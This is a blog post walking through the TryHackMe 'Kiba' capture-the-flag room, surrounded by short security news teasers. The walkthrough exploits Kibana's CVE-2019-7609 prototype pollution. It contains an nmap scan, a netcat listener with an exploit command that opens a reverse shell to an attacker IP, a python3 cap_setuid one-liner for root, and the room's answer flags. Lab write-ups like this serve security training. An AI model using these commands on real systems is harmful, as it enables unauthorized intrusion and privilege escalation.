Trending

Researchers Hacked EV Car Chargers To Execute Arbitrary Code

By CyberMrfu3k -
EVs face significant cyber risks due to their reliance on interconnected systems and the increasing number of public charging stations, which often lack robust security measures.  Vulnerabilities in EV software and charging infrastructure can expose vehicles to malware, unauthorized access, and potential control by hackers. During Pwn2Own Automotive 2024 in Tokyo, cybersecurity researchers hacked  EV car chargers  to execute arbitrary code. Researchers Hacked EV Car Chargers At the Pwn2Own Automotive 2024 event, researchers exploited three EV chargers:-  Autel MaxiCharger (MAXI US AC W12-L-4G) ChargePoint Home Flex JuiceBox 40 Smart EV Charging Station  They executed arbitrary code via Bluetooth while focusing on the Autel MaxiCharger, and this uncovered the “CVE-2024-23958,” “CVE-2024-23959,” and “CVE-2024-23967”  vulnerabilities . The features of the charger include WiFi, Ethernet, Bluetooth, 4G LTE, RFID, LCD touchscreen, RS485, and a USB-C port. Its har...
Post a Comment

kiba-TryHackMe

By CyberMrfu3k -


What is Kibana ?

Pls visit link : https://www.elastic.co/what-is/kibana

This is a write-up for Kiba room from TryHackMe. It can be found here:- https://tryhackme.com/room/kiba

 


Room Description

        Identify the critical security flaw in the data visualization dashboard, that allows execute remote code execution.

#1 What is the vulnerability that is specific to programming languages with prototype-based inheritance?

Check out the following link which describes this issue in details and will also give the answer:

Plz visit link : https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/#:~:text=Prototype%20pollution%20is%20a%20vulnerability,lacks%20practical%20examples%20of%20exploitation.

Use :  prototype pollution

#2 What is the version of visualization dashboard installed in the server?

Lets first enumerate the box using NMAP to find out all the open ports with the command:

sudo nmap -sS -Pn -T4 -p- 10.10.125.142

Lets find out what is ruuning on these open ports using the command:

sudo nmap -O -A -Pn -T4 -p22,80,5044,5601 10.10.125.142

The most interesting thing that comes out of this NMAP scan is kibana running on port 5601 which is open source data visualization dashboard for Elasticsearch.

Open this in a browser and look around and we will get the version which we are looking for.

Use : 6.5.4

#3 What is the CVE number for this vulnerability?  This will be in the format: CVE-0000-0000

Now we have the application name Kibana and a version, if we search we will find the CVE. The details can also be found Answer #1

Use : CVE-2019-7609

#4 Compromise the machine and locate user.txt

Lets exploit the CVE and gets reverse shell. I have used an already published exploit available here:-

https://github.com/LandGrey/CVE-2019-7609/  

First open up a netcat listen from the attacking machine using:

nc -nlvp 9999

and run the exploit as 

python CVE-2019-7609-kibana-rce.py -u http://10.10.41.246:5601 -host 10.10.10.10 -port 9999 --shell

We will get the reverse shell and the user flag:

Use : THM{1s_easy_pwn3d_k1bana_w1th_rce}

#5 Capabilities is a concept that provides a security system that allows "divide" root privileges into different values

Nice to know and no answer needed.

#6 How would you recursively list all of these capabilities?

Use getcap -r /

#7 Escalate privileges and obtain root.txt

Use the above command to find capabilities which can be abused and we will find:
 

python3 in /home/kiba/.hackmeplease directory have cap_setuid set which can be abused to get root privileges using:

/home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

and the root flag at /root/root.txt:  
 
Use :  THM{pr1v1lege_escalat1on_us1ng_capab1l1t1es}


Submit the flag and get the points :D See you next time.


 

Comments

Post a Comment

Popular posts from this blog

Ninjutsu OS- Windows based pentesting distribution

By -
Image
Ninjutsu Project Hey everyone. Hope you all are doing good. Today I came across a post in Linkedin by Hasan , a Red team Penetration tester. It's as follows I started exploring and came to know about this distribution. A Windows based pentesting distribution!!  Sound exciting right? Within few minutes i ended up downloading the OS (17gb -_- ) Don't forget to visit their official blog and support the developer if you like his work.
Read more

Fog Ransomware

By CyberMrfu3k -
Image
‛Fog’ Ransomware Rolls in to Target many Sectors. A new group of hackers is encrypting data in virtual machines, leaving ransom notes, and calling it a day. A new ransomware operation has been performing old-fashioned ransomware attacks, locking up data in virtual environments to earn quick payouts. Attack Vectors • Fog attacks typically begin with stolen virtual private network (VPN) credentials, an increasingly popular means of initial access into sizable organizations. The group has exploited two different VPN gateway vendors thus far, which Arctic Wolf has declined to name. • In one case, for example, Fog passed the hash to compromise administrator accounts in its target’s network. It then used the accounts to establish a remote desktop protocol (RDP) connection with Windows servers running the Hyper-V hypervisor and Veeam data protection software. • Other common Fog tactics, techniques, and procedures (TTPs) include credential stuffing, using native Windows and open-source tools l...
Read more

New PIXHELL Attack Exploits Screen Noise to Exfiltrates Data from Air-Gapped Computers

By CyberMrfu3k -
Image
Security researchers have unveiled new techniques that allow attackers to exfiltrate sensitive data from air-gapped computers, which are systems physically isolated from unsecured networks. Despite air gaps being a strong security measure, these attacks demonstrate that determined adversaries can still find ways to breach such systems. Dr. Mordechai Guri and his team at Ben-Gurion University in Israel have published multiple papers detailing various  covert channels  that can be used to leak data from air-gapped systems. Their latest  research focuses  on exploiting computer components’ electromagnetic, acoustic, thermal, and optical emanations to transmit data to nearby receivers. One attack, dubbed  RAMBO  (Radiation of Air-gapped Memory Bus for Offense), exploits electromagnetic emissions from a computer’s RAM to leak data. Malware can generate controlled radio signals that encode stolen information by manipulating memory access patterns. Using a softwar...
Read more